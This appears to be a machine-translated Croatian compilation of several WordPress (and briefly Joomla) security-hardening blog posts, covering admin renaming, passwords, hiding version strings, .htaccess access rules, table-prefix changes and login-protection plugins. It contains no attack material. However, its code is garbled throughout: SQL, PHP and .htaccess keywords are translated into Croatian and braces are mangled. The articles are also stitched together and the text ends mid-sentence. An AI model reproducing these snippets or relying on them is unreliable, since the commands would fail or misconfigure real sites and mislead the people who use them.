Administratorska ploča WordPressa je napadnuta, što da radim? Pouzdana zaštita za WordPress od hakiranja. Koristite sigurnu vezu

Iz članka ćete naučiti:

1. Koristite dobru prijavu.

Osiguravanje WordPress stranice počinje s nečim osnovnim—stvaranjem dobre prijave. Kada instaliraju WordPress, korisnici često koriste prijavu koju instalacijski program nudi prema zadanim postavkama, naime – admin. To je ono što botovi koji traže sigurnosne rupe na vašoj stranici prvo provjeravaju. Koristeći ovu prijavu, hakerima već dajete polovicu potrebnih podataka, a oni samo trebaju otkriti lozinku.

Ako ste već instalirali platformu i radite na svojoj web stranici, malo je vjerojatno da ćete htjeti deinstalirati instalaciju i krenuti ispočetka kako biste koristili sigurniju prijavu. Postoji izlaz:

Korak 1 – Stvorite novog korisnika

Prijavite se na WordPress administratorsku ploču i kreirajte novi račun sa složenijom prijavom, s potpunim pristupom svim funkcijama stranice, odnosno administratorskim pravima.

U glavnom izborniku s lijeve strane odaberite Korisnici >> Dodaj nove.

Unesite sve potrebne podatke za novog korisnika, definirajući njegovu ulogu kao "Administrator" i pritisnite "Dodaj novog korisnika".

Korak 2 – Uklanjanje admin korisnika

Nakon toga odjavite se iz sustava upravljanja, prijavite se novim račun i izbrisati korisnika admin iz sustava na jedan od sljedećih načina:

Metoda 1 – Odaberite iz glavnog izbornika s lijeve strane Korisnici >> Svi korisnici. Zadržite pokazivač iznad korisničkog imena admin i vidjet ćete funkciju "Izbrisati".

Metoda 2 - Odaberite u glavnom izborniku s lijeve strane Korisnici >> Svi korisnici. Pronađite korisnika admin, označite i s padajućeg izbornika "Akcije" Izaberi "Izbrisati". Nakon toga kliknite na opciju "Primijeni" ispod popisa korisnika. Ova je opcija prikladna ako trebate izbrisati nekoliko korisnika odjednom.

Također možete promijeniti korisničko ime administratora putem upita baze podataka:
AŽURIRAJ wp_users SET user_login = 'new_login' WHERE user_login = 'admin';

Ova metoda ima nedostatak: autor je za postove koje je napisao korisnik admin, neće se mijenjati. Kako biste to popravili, trebate napraviti još jedan upit u bazi podataka:
AŽURIRAJ wp_posts SET post_author = 'new_login' WHERE post_author = 'admin';

2. Koristite složenu i jedinstvenu lozinku.

Zaštita vašeg WordPress administratora je, naravno, nemoguća bez jake, dobre lozinke. Važno je da bude jedinstven i da sadrži brojeve, slova različitih veličina, interpunkcijske znakove, simbole itd. Lozinke poput: pass, 1q2w3e4r5t6y, 87654321, qwerty, abc123, 111111, 1234, vaš datum rođenja itd. – nisu pouzdani, ali ih mnogi korisnici nastavljaju koristiti. Primjer dobre lozinke: pcVaOF8r39. Naravno, bit će vam teško zapamtiti takvu lozinku, ali za to postoji niz programa koji pohranjuju i generiraju lozinke, a mogu se integrirati i u sučelje vašeg preglednika (npr. Password Agent, KeyPass, Roboform, itd.)

Ako i dalje želite pamtiti svoje lozinke napamet, preporučujemo stvaranje kombinacije lozinki od imena/riječi koja vam je poznata, s nekoliko velikih slova/brojeva na nasumičnim mjestima i nekoliko posebnih znakova na početku ili kraju. Takvu će lozinku također biti teško pogoditi, ali će ju biti prilično lako zapamtiti.

Ne zaboravite redovito ažurirati svoje lozinke.

3. Ažurirajte svoju verziju WordPressa.

WordPress brine o svojim korisnicima i zato možete pronaći obavijesti o odjavi na svojoj administratorskoj ploči nova verzija. Preporučamo ažuriranje čim ga vidite, jer se koristi jedna od najčešćih sigurnosnih rupa na vašoj web stranici zastarjela verzija platforme.

4. Sakrij verziju WordPressa.

WordPress prema zadanim postavkama dodaje trenutni broj verzije izvor vaše datoteke i stranice. A budući da često nije uvijek moguće ažurirati verziju WordPressa na vrijeme, ovo može postati slaba točka vaše web stranice. Znajući koju verziju WordPressa imate, haker može napraviti mnogo štete.

Korištenje datoteke funkcije.php Možete spriječiti prikazivanje informacija o verziji vaše platforme. Da biste to učinili, morate otvoriti datoteku funkcije.php, koji se nalazi u korijenskoj mapi trenutne teme vaše web stranice (wp-content/themes/current_theme_wordpress) i dodajte sljedeći kod:
remove_action('wp_head', 'wp_generator');

Ili možete dodati sljedeći kod u datoteku funkcije.php:

/* Sakrij nizove WP verzije iz skripti i stilova
* @return (string) $src
* @filter script_loader_src
* @filter style_loader_src
*/
funkcija fjarrett_remove_wp_version_strings($src) (
globalna $wp_verzija;
parse_str(parse_url($src, PHP_URL_QUERY), $upit);
if (!empty($query['ver']) && $query['ver'] === $wp_version) (
$src = remove_query_arg('ver', $src);
}
povratak $src;
}
add_filter('script_loader_src', 'fjarrett_remove_wp_version_strings');
add_filter('style_loader_src', 'fjarrett_remove_wp_version_strings');

/* Sakrij nizove WP verzije iz meta oznake generatora */
funkcija wpmudev_remove_version() (
povratak";
}
add_filter('the_generator', 'wpmudev_remove_version');

Osim gore navedenog, u bilo kojoj WordPress tematskoj mapi pronaći ćete zaglavlje.php datoteka. Također ukazuje na verziju vaše instalacije, što je vrlo zanimljivo za hakere, kao što je ranije spomenuto. Uklanjanjem sljedećeg retka iz datoteke, riješit ćete se ovih nepotrebnih informacija:

” />

5. Preuzmite teme i dodatke iz pouzdanih izvora.

WordPress je toliko raširen da sve više programera stvara gotove teme i dodatke za njega. Dok će većina njih olakšati korištenje vaše stranice i proširiti njezinu funkcionalnost, neki mogu sakriti vrlo neugodne posljedice u vidu virusa i otvoriti vrata hakerima. Koristite samo pouzdane izvore za preuzimanje tema i dodataka, na primjer, wordpress.org, a također obratite pozornost na sva upozorenja koja se pojavljuju o zlonamjernim datotekama. Baš kao i sa samim WordPressom, važno je da vaši dodaci budu ažurni s najnovijim verzijama.

6. Ne spremajte nepotrebne datoteke.

Neaktivna proširenja mogu predstavljati ozbiljnu prijetnju sigurnosti vaše web stranice. Stoga slobodno izbrišite sve nekorištene dodatke i teme. Na primjer, instalirali ste ga da testirate i odaberete onaj koji ćete koristiti. Nakon odabira ne zaboravite izbrisati sve nepotrebne.

7. Redovito skenirajte lokalno računalo na viruse.

Poduzimanje raznih koraka za osiguranje vaše WordPress stranice je dobro, ali također morate paziti na svoje računalo. Morate imati stalno ažurirani antivirusni program. U protivnom riskirate zaraziti svoje web mjesto učitavanjem virusnih datoteka na njega.

8. Napravite sigurnosne kopije stranice.

Ne mogu se spriječiti svi zlonamjerni napadi, ali samo jedan uspješan napad može uništiti sve napore u radu na vašoj stranici. Preporučujemo da redovito izrađujete sigurnosne kopije svoje web stranice. Mnoge hosting tvrtke pružaju opciju sigurnosne kopije poslužitelja i ako se nešto dogodi, možete vratiti stranicu iz kopije koja je dostupna na poslužitelju.

Instaliranjem dodatka WordPress Database Backup možete dodatno osigurati bazu podataka svoje web stranice. Postavke dodatka omogućuju vam postavljanje opcije slanja dnevne sigurnosne kopije baze podataka u vaš kontakt poštanski sandučić.

9. Koristite sigurnu vezu.

Ako radije učitavate svoje datoteke pomoću FTP klijenta, koristite protokol sigurne veze sa SFTP poslužiteljem.

10. Napravite .htaccess datoteku.

Kod za zaštitu od hotlinkinga:

RewriteEngine uključen
RewriteCond %(HTTP_REFERER) !^http://(.+\.)?vašadomena\.com/
RewriteCond %(HTTP_REFERER) !^$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpg [L]

Hotlinking je umetanje slike s vašeg poslužitelja na tuđu web stranicu/blog. Promet ide izravno na vaš poslužitelj.

Pomoću gornjeg koda možete natjerati poslužitelj da provjeri odakle točno zahtjev dolazi: ako sa stranica vaše web stranice, tada poslužitelj vraća sliku korisniku bez ikakvih problema; ako je s tuđe web stranice, prikazuje sliku s pogreškom.

11. Promijenite prefiks tablica baze podataka.

WordPress-ova zaštita od hakera također će biti poboljšana ako se ukloni početni prefiks. wp_ — To će otežati napadačima da vas pronađu. Razmotrimo nekoliko načina:

Metoda 1 – Prikladna za nove instalacije putem Softaculous-a
Ako vam pružatelj usluga hostinga dopušta korištenje Softaculous skripte za instalaciju WordPressa, možete promijeniti prefiks tijekom početne instalacije: u odjeljku Napredne opcije morat ćete izvršiti potrebne promjene.

Metoda 2 – Za već pokrenute stranice i svježe instalacije WordPressa
Ako je vaš WordPress već duže vrijeme instaliran i stranica radi, tada možete promijeniti prefiks pomoću programa phpMyAdmin.

Odaberite potrebnu bazu podataka s popisa i napravite sljedeći upit za bazu podataka:

PREIMENI tablicu `wp_commentmeta` U `newprefix_commentmeta`;
PREIMENI tablicu `wp_comments` U `newprefix_comments`;
PREIMENI tablicu `wp_links` U `newprefix_links`;
PREIMENI tablicu `wp_options` U `newprefix_options`;
PREIMENI tablicu `wp_postmeta` U `newprefix_postmeta`;
PREIMENI tablicu `wp_posts` U `newprefix_posts`;
PREIMENI tablicu `wp_terms` U `newprefix_terms`;
PREIMENUJ tablicu `wp_term_relationships` U `newprefix_term_relationships`;
PREIMENI tablicu `wp_term_taksonomija` U `newprefix_term_taksonomija`;
PREIMENI tablicu `wp_usermeta` U `newprefix_usermeta`;
PREIMENI tablicu `wp_users` U `newprefix_users`;

Gdje "novi prefiks_" mora se zamijeniti novim prefiksom koji želite koristiti umjesto prefiksa "wp_".

Nakon toga vidjet ćete novi prefiks u tablicama baze podataka:

Kako bi se osiguralo da su sve promjene bile uspješne i da se prefiks wp_ više ne koristi u tablici _opcije I _usermeta, morat ćete napraviti još jedan upit u bazi podataka:

SELECT * FROM `newprefix_options` WHERE `option_name` LIKE '%wp_%'

SELECT * FROM `newprefix_usermeta` WHERE `meta_key` LIKE '%wp_%'

Kao rezultat toga, možda ćete pronaći brojne prefikse koje ćete morati ručno preimenovati pomoću gumba Promijeniti:

Broj promjena koje ćete morati napraviti može varirati. Ali svi prefiksi wp_ morate promijeniti svoj novi prefiks kako bi web stranica ispravno funkcionirala.

Nakon toga, ne zaboravite unijeti i promjene prefiksa wp-config.php datoteka:

Također možete koristiti posebne dodatke za promjenu prefiksa baze podataka: Promjena DB prefiksa ili Promjena prefiksa tablice.

12. Ograničite broj pokušaja pristupa.

Najčešće napadači u velikom broju pokušaja uđu na vašu stranicu pogađajući vašu lozinku. Možete konfigurirati sustav da blokira IP adresu nekoliko sati nakon određenog broja neuspjelih pokušaja prijave.

Da biste to učinili, možete koristiti dodatne dodatke, na primjer, Login LockDown ili Limit Login Attempts. U postavkama ovih dodataka možete samostalno postaviti broj pokušaja prijave i vrijeme blokiranja.

Dodatno, moguće je sakriti prikaz poruke da su uneseni login i lozinka netočni. Uostalom, i to je informacija koja može pomoći napadaču.

Da biste potisnuli ovu poruku, morate otvoriti datoteku funkcije.php, koji se nalazi u mapi trenutne teme vaše web stranice (wp-content/themes/current_theme_WordPress) i dodajte ovaj kod:
add_filter('login_errors',create_function('$a', "return null;"));

13. Uklonite readme.html i license.txt.

Datoteke readme.html i license.txt nalaze se u korijenskoj mapi svake instalacije WordPressa. Ove vam datoteke nisu od koristi, ali hakerima mogu pružiti dokaze za njihove zločine. Na primjer, saznati trenutnu verziju vašeg WordPressa i mnoge druge korisne stvari za hakiranje web stranice. Preporučujemo da ih uklonite odmah nakon instalacije WordPressa.

14. Koristite SSL certifikat.

Za prijenos zaštićenih informacija i povjerljivost razmjene podataka preporučamo korištenje SSL protokola. To posebno vrijedi za internetske trgovine ako ne želite da se osobni podaci o vašim kupcima prenose na nezaštićen način.

Prije svega, morat ćete ga instalirati za naziv svoje domene.

Nakon toga možete postaviti obaveznu upotrebu SSL protokola prilikom prijave na upravljačku ploču svoje stranice. Da biste to učinili, otvorite wp-config.php datoteku koja se nalazi u korijenskoj mapi vaše web stranice i dodajte sljedeći redak:
define('FORCE_SSL_ADMIN', istina);

15. Uredite datoteku wp-config.php.

Dodavanjem ovog koda u wp-config.php datoteku, također možete pojačati zaštitu svoje web stranice:

Ograničenja promjena teme i dodataka:
define('DISALLOW_FILE_EDIT', true);

Onemogućivanje mogućnosti instaliranja i uklanjanja dodataka:
define('DISALLOW_FILE_MODS', true);

Dodavanje slanih ključeva ili takozvanih sigurnosnih ključeva: prvo ćete morati pronaći takve retke wp-config.php datoteka:

Vidjet ćete da su ključevi već instalirani i da se mogu mijenjati. Ili ćete vidjeti retke poput ovog: "stavite svoju jedinstvenu frazu ovdje", što znači da ključevi još nisu instalirani:
/**#@+
* Jedinstveni ključevi i soli za provjeru autentičnosti.
*
* Promijenite ih u različite jedinstvene fraze!
* Možete ih generirati pomoću (@link https://api.wordpress.org/secret-key/1.1/salt/ usluge tajnog ključa WordPress.org)
* Možete ih promijeniti u bilo kojem trenutku kako biste poništili sve postojeće kolačiće. Ovo će prisiliti sve korisnike da se moraju ponovno prijaviti.
*
* @od 2.6.0
*/
define('AUTH_KEY', 'ovdje stavite svoju jedinstvenu frazu');
define('SECURE_AUTH_KEY', 'ovdje stavite svoju jedinstvenu frazu');
define('LOGGED_IN_KEY', 'ovdje stavite svoju jedinstvenu frazu');
define(‘NONCE_KEY’, ‘ovdje stavite svoju jedinstvenu frazu’);
define('AUTH_SALT', 'ovdje stavite svoju jedinstvenu frazu');
define(‘SECURE_AUTH_SALT’, ‘ovdje stavite svoju jedinstvenu frazu’);
define('LOGGED_IN_SALT', 'ovdje stavite svoju jedinstvenu frazu');
define(‘NONCE_SALT’, ‘ovdje stavite svoju jedinstvenu frazu’);

Želio bih posebno spomenuti neke dodatke:

Ovo je sigurnosni dodatak za WordPress koji vam omogućuje skeniranje vaše web stranice u potrazi za zlonamjernim kodom, prazninama i rupama koje su ostavili hakeri, prikazujući analitiku stranice i prometa u stvarnom vremenu. Također je moguće konfigurirati automatsko skeniranje i još mnogo toga.

Ovaj dodatak provjerava ima li na vašoj web stranici raznih sigurnosnih propusta i nudi niz metoda za njihovo popravljanje. Na primjer, lozinke, različita prava pristupa datotekama, zaštita baze podataka, zaštita podataka o verziji WordPressa, zaštita administratora itd.

Ovaj dodatak vam omogućuje da zaštitite korisničke račune i prijave, baze podataka i datotečne sustave, spriječite napade brutalnom silom (napadi pogađanjem lozinke), skenirate web mjesto itd.

Koliko god tužno zvučalo, zaštita WordPressa je složena stvar, a metode opisane u ovom članku ne jamče 100% da će vaša stranica biti potpuno zaštićena od bilo kakvih radnji prevaranata. No, ne smijete ih zanemariti jer će značajno smanjiti mogućnost hakerskog hakiranja stranice.

WordPress je vrlo popularan CMS, to je nedvojbeno njegova prednost, ima mnogo dodataka za bilo koji zadatak, ali to je i njegova slabost, jer što je CMS popularniji za web mjesto, to je više napada na njega, odnosno Zanimljivije za napadače, budući da su pronašle ranjivost. U WordPressu stotine tisuća stranica postaju dostupne napadačima, stoga zaštita vaše WordPress stranice zahtijeva posebnu pozornost.

Zašto su WordPress stranice hakirane?

Svi popularni CMS-ovi (mašine za web stranice) su hakirani, a WordPress nije iznimka, ja hakiram uglavnom koristeći takozvane programe (skripte) - exploite, kako bih dobio kontrolu nad web mjestom, to se radi uglavnom za stvaranje poveznica s vašeg web mjesta na druge resurse , te stvoriti BotNet koji izvodi DDoS napade na druge servere, a stranica ostaje u funkciji i nikada nećete vidjeti golim okom da je zaražena. U svakom slučaju, hakiranje će loše utjecati na vašu stranicu, a možda ćete i nestati iz rezultata pretraživanja.

Kao što sam već rekao, hakiranje se događa automatski, identificiranje CMS-a stranice nije teško, za to postoje mnoge online usluge, često napadački program pokušava pogoditi lozinku iz administrativnog dijela stranice, tj. ide na adresu your-site.ru/wp-admin i pokušava pogoditi lozinku za vašeg korisnika, saznati korisničko ime nije teško, pišete članke pod njim, tako da će prijava biti vidljiva botovima, oni znaju gdje potraži to. osim ako ga, naravno, niste zatvorili pomoću dodatka, o jednom od kojih ćemo govoriti u nastavku. Lozinka za administratora stranice trebala bi biti vrlo složena, ali čak i ako je ovaj uvjet ispunjen, ne možete dopustiti botovima da pokušaju (grubom silom) lozinku za "admin ploču", jer to nije potrebno opterećenje na poslužitelju, zamislite nekoliko desetaka botova iz različitih dijelova svijeta to radi.

Dodatak za zaštitu WordPressa od napada

Prijeđimo ravno na dodatak, postoji nekoliko vrijednih razmatranja, razgovarajmo o jednostavnijem i razumljivijem, koristim ga na mnogim svojim projektima, za klijente, vrlo se dobro nosi s dodijeljenim zadacima zaštite web mjesta -

Ovaj dodatak je prilično jednostavan za naučiti i 90% je rusificiran, instalira se kao i svaki dodatak iz WordPress repozitorija, nakon instalacije morate ga aktivirati i napraviti osnovne postavke. Pojavljuje se u glavnom izborniku u WordPress administratorskom području

Kontrolna ploča sigurnosnog dodatka WP

Nakon odlaska na postavke dodatka, dolazimo do upravljačke ploče. Ovdje možete napraviti osnovne važne postavke.

  1. Prikazuje zadnjih 5 autorizacija u tvom admin panelu, navedeni su korisnik i IP adresa, npr. ja odmah vidim svoje IP, samo su ih dva, tako da ne sumnjam da još netko zna moju lozinku iz administrativnog dijela.
  2. Odjeljak najvažnijih funkcija, ovdje morate uključiti sve i složiti se sa svime.
  3. Dodatak je sposoban pratiti promjene datoteka na hostingu i može vam poslati izvještaj putem e-pošte, a vi uvijek znate koje su datoteke promijenjene, ovo je vrlo korisno, ako ste preuzeli neku vrstu skripte ili bilo koje datoteke sa zlonamjernim kodom, odmah ćete ga vidjeti u izvješću, jedina mana je da će nakon ažuriranja svih drugih dodataka koje ste instalirali ili samog WordPressa, WP Security vidjeti sve te promjene i poslati vam ogroman popis, ali možete dobiti navikli na ova izvješća, jer znate kada ste sami ažurirali datoteke.
  4. Ova stavka mijenja standardnu ​​adresu administratorske ploče web stranice yoursite.ru/wp-admin u yoursite.ru/luboe-slovo, ovo će spasiti vašu administratorsku ploču od nekih potencijalnih hakera i robota, ali nažalost ne od svih njih , posebno napredni ga još uvijek pronalaze, o tome mogu procijeniti gledajući odjeljak "Ovlaštenja", ali o tome kasnije.
  5. Ovu stavku treba isključiti, kao na snimku zaslona, ​​potrebna je samo kada želite staviti stranicu na održavanje, posjetitelji će dobiti znak s porukom da su na stranici u tijeku tehnički radovi, ponekad je to korisno, npr. , kada mijenjate dizajn stranice ili u slučaju nekih globalnih promjena, ne zaboravite da u ovom načinu rada roboti za pretraživanje također ne mogu vidjeti vašu stranicu, nemojte je zatvarati na duže vrijeme.

Zaštita WordPress administratorskog područja od pogađanja lozinke

Sada idemo na stavku izbornika - Autorizacija, po mom mišljenju, vrlo korisna stavka i vrijedi je postaviti, kao što je na jednom od mojih mjesta. uz prisustvo od oko 1000 ljudi, dodatak hvata desetke pokušaja dnevno za pogađanje lozinke za administratorsku ploču i dodaje IP adrese hakera na crnu listu, tj. potpuno blokira, stranica prestaje odgovarati na ovu IP adresu, čime se poništavaju pokušaji pronalaženja lozinke, postavke koje postavljam na zaslonu.

  1. Ostavljam broj pokušaja "pogriješiti" na -3, nemojte činiti manje, možda ćete sami unijeti netočnu lozinku i završiti na crnoj listi sa svojim IP-om, morat ćete
  2. Ovo je vrijeme nakon kojeg se brojač netočnih pokušaja prijave resetira.
  3. Postavio sam razdoblje blokade za IP adrese s kojih su pokušaji netočne autorizacije bili duži, u minutama, tj. kupka dugo vremena, snimak zaslona pokazuje 6.000.000 minuta, to je oko 11 godina, mislim da je to dovoljno

Svim blokiranim IP-ovima bit će zabranjen pristup ne samo administratorskoj ploči, već cijeloj web-lokaciji, imajte to na umu

Popis blokiranih IP adresa

  1. IP adresa napadača
  2. usput, prijava za koju je odabrana lozinka je ispravna
  3. datum kada je izvršeno automatsko blokiranje

Bijela lista adresa za admin panel

Kako biste omogućili pristup administrativnom dijelu WordPress stranice samo s određenih IP adresa, možete aktivirati bijeli popis adresa u postavkama dodatka.

  1. aktiviranje ove opcije
  2. ovdje je vaša trenutna IP adresa
  3. u ovo polje unesite sve IP adrese s kojih je dozvoljen pristup admin panelu

Ako trebate navesti niz IP adresa, tada umjesto broja upotrijebite zvjezdicu, na primjer 192.168.5.* - ovaj dizajn će omogućiti pristup WordPress administratorskoj ploči sa svih IP adresa koje počinju ovim brojevima, ova metoda može biti koristan za one koji nemaju namjensku IP adresu, a ona se stalno mijenja, na primjer, kada radite s mobilnim internetom, u pravilu će raspon ostati unutar prve dvije znamenke, poput ovoga, na primjer 192.168.* .*

Vrijeme čitanja: 4 min

Prije samo godinu dana opterećenje mog poslužitelja vrlo je često prelazilo limit dopušten tarifom. Štoviše, problem nije bio u samim stranicama, već u banalnom napadu napadača na admin panel kako bi dobili pristup za neke svoje svrhe.

Danas ću vam reći kako sam se ja nosio s problemom, što vam savjetujem da za svaki slučaj učinite kod kuće.

Kao rezultat toga, odlučeno je promijeniti adresu obrasca za prijavu u admin ploči, kao i zatvoriti admin ploču za sve strance koji nemaju moj IP.

Vrijedno je napomenuti da su neke hosting tvrtke same automatski stvorile novu adresu administratora za sve korisnike. Ako koristite usluge takvih hosting usluga, nemojte čitati dalje članke i ne gubite vrijeme.

Kako promijeniti WordPress adresu administratora

Prethodno sam objavio takav članak. Čini se da je ovdje sličan rezultat, ali učinak i svrha su drugačiji.

Ne zaboravite napraviti sigurnosne kopije datoteka s kojima radite.

  • Najprije kopirajte datoteku wp-login.php iz korijena stranice (gdje se nalazi wp-config.php) putem ftp-a na svoje računalo.
  • Preimenujte ga kako želite. Na primjer vhod.php
  • Otvorite ovu datoteku besplatnim programom Notepad++ (ili bilo kojim drugim programom koji vam je prikladniji za uređivanje) i zamijenite sva pojavljivanja izraza wp-login.php s vhod.php .

To možete brzo učiniti pritiskom na CTRL+F u Notepad++. Pa, u prozor koji se pojavi unesite:

Tako sam u sekundi zamijenio pojavljivanje fraze koju sam trebao u cijeloj datoteci. Naišao je 12 puta.

Novu datoteku učitavamo na ftp.

Sličnu stvar morat ćete napraviti u datoteci general-template.php, koju ćete pronaći u mapi wp-includes upravo tamo na ftp-u. Oni. promijenite pojavljivanje izraza wp-login.php u vhod.php , ali nemojte mijenjati sam naziv datoteke!

Sada imate .htaccess datoteku u korijenu stranice. Također ga kopiramo na naše računalo i otvaramo za uređivanje (možete koristiti obični Windows Notepad). Umećemo dio koda koji blokira svačiji pristup datoteci wp-login.php

Odbij nalog, dopusti odbijanje od svih

< Files wp - login . php >

Narudžba Odbij, Dopusti

Odbiti od svih

< / Files >

Upravo je ovaj korak oslobodio tereta i sakrio obrazac za autorizaciju. Opterećenje je smanjeno umetanjem prikazanog koda u .htaccess: ako je postojao poziv na http://site.ru/wp-login.php, dat će se pogreška 403, a ne 404.

Ponovimo ukratko algoritam rada:

  • Preimenujte datoteku wp-login.php u proizvoljan naziv i zamijenite naziv koji se pojavljuje novim.
  • Slično, u datoteci general-template.php stari naziv wp-login.php zamjenjujemo novim.
  • Registriramo u .htaccess datoteku zabranu pristupa wp-login.php za sve

Nakon ažuriranja WordPressa, sve što preostaje za ispraviti je datoteka general-template.php. Ali zbog Motor se ne ažurira često - to je mala stvar u usporedbi s učinkom.

Postavili smo ograničenje prijave putem IP-a putem .htaccess

Kao dodatne mjere za zaštitu stranice usvojio sam ograničenje prijave u admin ploču putem IP-a. Problem je riješen vrlo jednostavno: kreirajte praznu .htaccess datoteku i dodajte joj sljedeći kod

nalog zabrani, dopusti dopusti od 192.168.0.1 zabrani od svih

nalog odbiti, dopustiti

dopustiti od 192.168.0.1

odbiti od svih

Spremamo datoteku i ispuštamo je u mapu wp-admin na istom mjestu u korijenu stranice.

Umjesto mog IP-a iz primjera stavite svoj pravi. Štoviše, možete dodati nekoliko IP-ova u svakom novom retku:

naručiti odbiti, dopustiti dopustiti od 126.142.40.16 dopustiti od 195.234.69.6 odbiti od svih

nalog odbiti, dopustiti

omogućiti od 126.142.40.16

omogućiti od 195.234.69.6

odbiti od svih

Ako je IP dinamički, tada možete staviti brojeve samo do prve, druge ili treće točke:

Vjerojatno već znate kako ući u administratorsko područje WordPressa?

To možete učiniti na najmanje četiri načina dodavanjem sljedećeg na adresu vaše web stranice:

  1. /admin, tj. ovako: http://yoursite/admin
  2. /wp-admin
  3. /prijaviti se
  4. /wp-login.php

Općenito, sve prve tri opcije preusmjeravanja i dalje će vas voditi na stranicu: http://your_site/wp-login.php

Ispostavilo se da svatko može dodati bilo koji od četiri gore opisana prefiksa na adresu vaše stranice i vidjet će administratorsku prijavu:

Naravno, to uopće ne znači da bilo tko može lako ući u admin panel, jer mora znati i korisničko ime ili vaš e-mail i lozinku.

Ako vaš administratorski korisnik ima prijavu: – onda to nije nimalo razborito s vaše strane i napadač će samo morati pogoditi ili pogoditi vašu lozinku.

Osim toga, vidjeli ste natpis: Korisničko ime ili e-mail? Da, da, WordPress može koristiti e-poštu kao korisničko ime. Ali možete naznačiti adresu e-pošte negdje na stranici koja odgovara e-pošti korisnika administratora. Ispostavilo se da je prvo što napadač može pokušati unijeti vaš E-mail i onda će mu WordPress opet pomoći, jer ako E-mail nije odgovarajući, vidjet će ovu poruku:

i ako je E-mail ispravan, WordPress će napisati da je lozinka za njega netočna:

Kao rezultat toga imamo situaciju u kojoj će potencijalni napadač, da bi hakirao vašu stranicu (pristup admin panelu), samo trebao pogoditi ili pogoditi vašu lozinku.

Kako zaštititi prijavu administratora od potencijalne prijetnje? Odgovor je jednostavan - pokušajte povećati broj nepoznanica potrebnih za unos.

Sada pogledajmo pobliže:

  1. Ako je moguće, provjerite da E-mail korisnika administratora nije spomenut nigdje na stranici - javni E-mail trebao bi biti nešto drugo.
  2. Vaša lozinka ne smije biti jednostavna, kada sama instalacija WordPressa generira složenu lozinku za vas, ako je ne želite koristiti, smislite neku više ili manje složenu lozinku, uključujući male i velike znakove, brojeve i neke simbole poput -, ?, _ itd.
  3. Vaše korisničko ime također ne bi trebalo biti jednostavno: admin, upravitelj, root, administrator, korisnik i druge jednostavne riječi!
  4. I na kraju, trebate unijeti treću najvažniju nepoznanicu - promijeniti URL za prijavu administratora, da biste to učinili, instalirajte jednostavan dodatak: WPS Sakrij prijavu
WPS Sakrij prijavu

Jednostavan, besplatan i prilično popularan dodatak koji vam omogućuje promjenu URL-a za prijavu administratora.

Nakon instaliranja i aktivacije dodatka potrebno je otići u administratorsku sekciju: Postavke / Općenito, zatim se pomaknite do samog dna stranice i pogledajte samo jedan parametar koji je dodao ovaj dodatak:

Dodatak prema zadanim postavkama predlaže korištenje prijave http://yoursite/login - ali to nikako nije najbolja opcija! Smislite nešto svoje, na primjer: yyy12_go)))

Nakon promjene ovog parametra, ne zaboravite kliknuti na gumb Spremi promjene– u suprotnom, s aktivnim dodatkom, imat ćete prijavu putem http://vaša stranica/prijava

Svakako se pokušajte odjaviti i ponovno prijaviti u administratorsko područje, ali koristeći novu adresu za prijavu koju ste sami smislili, i što je najvažnije, nemojte je zaboraviti!

Nakon promjene administratorske ulazne točke, prilikom pokušaja pristupa standardnim URL-ovima, korisnik će dobiti stranicu s greškom 404.

Pažnja! Ako iznenada zaboravite novu administratorsku adresu za prijavu, morat ćete onemogućiti ovaj dodatak. To se može učiniti bez odlaska na administrativnu ploču ako imate pristup mapama i datotekama stranice. Samo trebate preimenovati ili izbrisati mapu dodatka wps-hide-login, koji će biti u mapi dodaci(mapa dodataka nalazi se u mapi wp-content).

Kao rezultat: nakon primjene svih gore navedenih mjera, trebali bismo dobiti administratorsku zaštitu prijave s tri nepoznanice: E-mail/korisničko ime, složena lozinka i vlastiti jedinstveni URL za prijavu - a to može značajno zakomplicirati napore mladih hakera)

Pozdrav, dragi čitatelji bloga. Danas želim razgovarati o sigurnosti posla i nekim metodama zaštite web stranice od hakiranja. Nažalost, nisam stručnjak u ovom području i moje znanje ne nadilazi okvire članka o tome, ali jednostavno ću opisati svoje nedavno iskustvo. Nisam koristio ništa komplicirano, ali se nadam da će ovo povećati sigurnost rada s mojim stranicama.

Riječ je o dvostruka provjera autentičnosti za prijavu na administrativnu ploču motora vaše web stranice (trebao bi raditi na bilo kojem CMS-u, ali osobno sam ga testirao samo na WordPressu i Joomli). Zaštita je instalirana na razini poslužitelja, tako da svi pokušaji pogađanja lozinke za administratorsku ploču (gruba sila) neće stvoriti povećano opterećenje hostinga i prilično ga je teško zaobići. Lako se instalira (doslovno u nekoliko koraka) i od sveg znanja zahtijeva samo pažnju i mogućnost pristupa stranici preko FTP-a.

Pa dat ću i par akcija koje sam primijenio na stranice na već zastarjelim Joomla 1.5 engineima na koje mi nema smisla prelaziti, ali mi stalno kvare server i koriste server za slanje spama. Nedavno sam izvršio opisane radnje pa ne mogu tvrditi da su stranice prestale biti zaražene virusima, ali se nadam. Općenito, malo sam pokušao povećati otpornost Joomle 1.5 na pucanje.

Kako zaštititi Joomlu 1.5 od hakiranja i virusa

Kao što sam već spomenuo, problem je u tome što su dvije moje stranice koje pokreću Joomla 1.5 stalno hakirane. Možemo ih smatrati napuštenima, jer im ne dodajem nove materijale, ali redovito ostvaruju prihod (od objavljivanja članaka s Miralinksa i Webartexa, kao i poveznica s Gogetlinksa). Općenito, šteta ih je baciti, a prebaciti ih na novu verziju motora je gubitak (gubitak vremena i truda).

Ostaje samo stalno pratiti opterećenje poslužitelja i, kada se poveća, tražiti školjke i druge zlonamjerne programe među datotekama motora ili nekako pojačati zaštitu. Za traženje zlonamjernog softvera preuzimam datoteke motora na svoje računalo i skeniram ih s DoctorWeb i Aibolit. Prvi ne nalazi sve, a drugi prečesto vidi neprijatelja tamo gdje ga nema, ali ne znam ni za jednu drugu učinkovitu metodu. Iako postoje i deseci programa, ali ovo je prikladnije za sve.

Usput, scenarij Aibolit može raditi ne samo na poslužitelju, već i izravno na računalu u mapi s preuzetim datotekama motora (samo nemojte zaboraviti onemogućiti standardni antivirusni program prilikom preuzimanja web mjesta, jer može izbrisati neke od datoteka, ali one će i dalje ostati na poslužitelju).

Detaljne upute dane su u videu ispod, ali ukratko, prevoditelj jezika PHP preuzimate s web stranice Microsofta i instalirate ga. Nakon toga otvorite datoteku skripte Aibolit pod nazivom ai-bolit.php koristeći upravo ovaj interpreter:

